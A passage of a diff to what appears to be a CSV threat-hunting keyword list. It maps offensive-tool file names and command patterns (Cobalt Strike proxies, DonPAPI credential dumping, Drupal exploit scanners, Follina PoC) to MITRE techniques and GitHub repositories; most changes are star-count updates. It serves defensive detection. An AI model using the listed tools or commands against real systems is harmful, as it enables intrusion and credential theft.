T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*DReverseServer.go*","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","457","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*drgreenthumb93/CVE-2022-30190-follina*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","1","10","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z" -"*DriverQuery.exe no-msft*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*drk1wi/Modlishka*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*DriverQuery.exe no-msft*","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*drk1wi/Modlishka*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" "*droopescan scan drupal -u * -t 32*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Droopscan*","offensive_tool_keyword","Droopscan","A plugin-based scanner to identify issues with several CMSs mainly Drupal & Silverstripe.","T1190 - T1199 - T1505 - T1210 - T1213","TA0005 - TA0009","N/A","N/A","Web Attacks","https://github.com/droope/droopescan","1","0","N/A","N/A","10","1124","248","2023-06-02T14:21:16Z","2014-10-22T22:06:30Z" -"*drop_malleable_unknown_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*drop_malleable_with_invalid_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*drop_malleable_without_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_unknown_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_with_invalid_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*drop_malleable_without_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dropboxC2.py*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dropper_cs.exe*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*dropper32.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*dropper64.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*drunkpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*drunkpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*drupal_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*drunkpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*drunkpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*drupal_enum.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*drupwn --mode exploit --target *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Drupwn*","offensive_tool_keyword","Drupwn","Drupal Security Scanner to perform enumerations on Drupal-based web applications.","T1190 - T1195 - T1200 - T1210 - T1211 - T1212 - T1213 - T1221 - T1222","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/immunIT/drupwn","1","0","N/A","N/A","6","543","132","2020-11-04T13:43:29Z","2018-04-04T15:13:27Z" "*dswmiexec.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" @@ -9646,14 +9794,14 @@ "*Dubmoat_ExtractData*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Dubmoat_PrintFilename*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Dubmoat_TruncateFile*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" -"*DueDLLigence.cs*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" -"*DueDLLigence.sln*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" -"*DueDLLigence-master*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence.cs*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence.sln*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*DueDLLigence-master*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*dump_chrome_user*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" -"*dump_CREDENTIAL_MSOFFICE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_CREDENTIAL_TASKSCHEDULER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_CREDENTIAL_TSE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_domain*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*dump_CREDENTIAL_MSOFFICE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_CREDENTIAL_TASKSCHEDULER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_CREDENTIAL_TSE*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_domain*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*dump_firefox_user*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_jenkins*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 